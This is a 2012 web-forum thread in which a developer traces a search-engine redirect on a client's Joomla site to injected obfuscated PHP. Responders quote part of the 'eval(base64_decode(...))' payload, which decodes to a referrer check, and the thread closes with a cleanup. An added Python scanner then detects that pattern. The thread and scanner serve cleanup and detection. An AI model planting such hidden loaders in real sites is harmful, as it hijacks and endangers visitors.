| HELP! Possible 302 hijack for client site | designcouch | 7/6/12 7:07 AM | My client's site has been the victim of a possible 302 hijack. Searching for "Frederick Living" brings up their results (http://www.frederick-mennonite.org) but when the links are clicked, pages from the http://bee.edns.biz domain are shown. This is an unrelated s |
| Re: HELP! Possible 302 hijack for client site | kravman85 | 7/7/12 9:09 AM | I'm having the exact same problem as well. I'm going to try refreshing/flushing dns, new primary domain, then if all else fails contacting the hosting company. Remember to use best practices and I typically ban any out of country IP address. |
| Re: HELP! Possible 302 hijack for client site | webado | 7/7/12 9:28 AM | Actually it's not hijacked. The website has been hacked with a conditional hack that redirects to the other possibly malicious site. That might be done through javascript so all internal js files and on-page js code need to be checked and all external |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/7/12 10:18 AM | Unless the site hack is dependent on the user arriving from a search engine, this is not the case, as navigating directly to their site doesn't result in a redirect. |
| Re: HELP! Possible 302 hijack for client site | webado | 7/7/12 10:29 AM | I said it's a conditional hack - and that it appears to be through javascript. |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/9/12 6:47 AM | Thank you for your response, webado. I'm poring over the site's javascript (on page and internal) files looking for the inserted code. The only external files are direct links to the Google code library (specifically the jQuery library). Can I consid |
| Re: HELP! Possible 302 hijack for client site | redleg-redleg | 7/9/12 6:53 AM | Check your site for some obfuscated php code, a line that starts out like this eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlY ........... the string of seemingly random characters will be pretty long. Start with your homepage t |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/9/12 6:58 AM | Redleg, That line of code appears to be in the index.php file of my site. Should deleting it solve the issue? |
| Re: HELP! Possible 302 hijack for client site | redleg-redleg | 7/9/12 7:19 AM | Yes, you need to remove that line. Just to be sure here is the entire line eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkc WF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJb |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/9/12 7:36 AM | Redleg, Yeah - I'd started looking into everything on the site, and it appears that most .php files are affected. It looks like I have a long day ahead of me deleting and re-saving files. In your experience, would re-installing Joomla be a viable sol |
| Re: HELP! Possible 302 hijack for client site | redleg-redleg | 7/9/12 7:42 AM | If you have a lot of individual files to clean up then it would probably end up being faster in the long run to re-install Joomla. |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/10/12 9:33 AM | Red Leg, I have re-installed Joomla AND restored the site from a backup from last year. All of the base64 code that was inserted is gone. However, search engines are still forwarding the site to the spam pages. Do you have any thoughts? Does it just |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/10/12 9:56 AM | I have also done a basic process inspection when clicking on the link from Google. This confirms that the hack is a 302 redirect, as initially suspected. I have included a screenshot of this process - note the status on the very top entry (the "frede |
| Re: HELP! Possible 302 hijack for client site | redleg-redleg | 7/10/12 11:05 AM | Unfortunately there is still something wrong, a lingering hack somewhere that did not get overwritten. There is a listing for a simple script at http://redleg-redleg.blogspot.com/p/simple-script-to-find-base64decode-in.html You copy and paste the |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/10/12 12:29 PM | Thanks Red Leg - that allowed me to locate the rest. Will update on whether or not it was successful. |
| Re: HELP! Possible 302 hijack for client site | designcouch | 7/10/12 1:34 PM | Final update - consider this issue closed. Red Leg's script helped me locate the last few files. Search results are now functioning just as they should. Thanks all! |
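
The file-by-file hunt described in the thread can be automated. The following is an added example, not part of the thread and not the script Red Leg linked: it walks a web root, flags every `.php` file containing an `eval(base64_decode("...` line, and decodes the payload to report signs of a referrer-conditional redirect. The function names, the indicator list and the demo files are assumptions constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# eval(base64_decode("...")) with optional whitespace and either quote style.
INJECT_RE = re.compile(
    rb"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]", re.I)
# Strings in the decoded payload that suggest a conditional redirect (assumed list).
INDICATORS = (b"HTTP_REFERER", b"HTTP_USER_AGENT", b"headers_sent", b"Location:")

def scan_file(path):
    """Return [(line_number, indicators_found)] for each injected call in one file."""
    data = Path(path).read_bytes()
    hits = []
    for m in INJECT_RE.finditer(data):
        blob = re.sub(rb"\s+", b"", m.group(1))
        blob += b"=" * (-len(blob) % 4)  # tolerate missing padding
        try:
            decoded = base64.b64decode(blob)
        except ValueError:  # undecodable blob: still report the line
            decoded = b""
        found = [i.decode() for i in INDICATORS if i in decoded]
        line = data.count(b"\n", 0, m.start()) + 1
        hits.append((line, found))
    return hits

def scan_tree(root):
    """Scan every .php file under root; return {relative_path: hits} for flagged files."""
    root = Path(root)
    results = {}
    for p in sorted(root.rglob("*.php")):
        hits = scan_file(p)
        if hits:
            results[p.relative_to(root).as_posix()] = hits
    return results

def build_demo_tree(root):
    """Constructed sample: one clean file and one with an injected line."""
    payload = base64.b64encode(b"error_reporting(0);$r=$_SERVER['HTTP_REFERER'];").decode()
    root = Path(root)
    (root / "sub").mkdir(parents=True, exist_ok=True)
    (root / "clean.php").write_text("<?php echo 'ok'; ?>\n")
    (root / "sub" / "index.php").write_text('<?php\neval(base64_decode("%s"));\n' % payload)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        build_demo_tree(d)
        print(scan_tree(d))
```

Point `scan_tree` at the site's document root and re-run it after a restore; an empty result means no file still carries the pattern, which is the check the 7/10 posts were missing after the reinstall.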